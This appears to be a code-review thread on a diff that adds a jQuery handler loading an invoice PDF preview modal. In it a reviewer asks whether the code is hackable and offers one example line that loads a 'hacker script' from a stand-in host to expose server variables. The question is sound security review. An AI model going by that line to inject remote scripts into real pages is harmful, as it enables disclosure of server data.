application/modules/invoices/views/partial_invoice_table.php

```diff
@@ -1,3 +1,12 @@
+<script>
+    $(function () {
+				$(document).on('click', '#invoice_preview_pdf', function () {
+            var invoice_id = $(this).data('invoice-id');
+            $('#modal-placeholder').load("<?php echo site_url('invoices/ajax/modal_preview_pdf'); ?>", {invoice_id: invoice_id});
```

Comment:
@Nomzei can you take a look? Is this hackable?
` $('#modal-placeholder').load("http://my-localhost:9000/my-hacker-script-to-see-server-variables.php");`

something like that?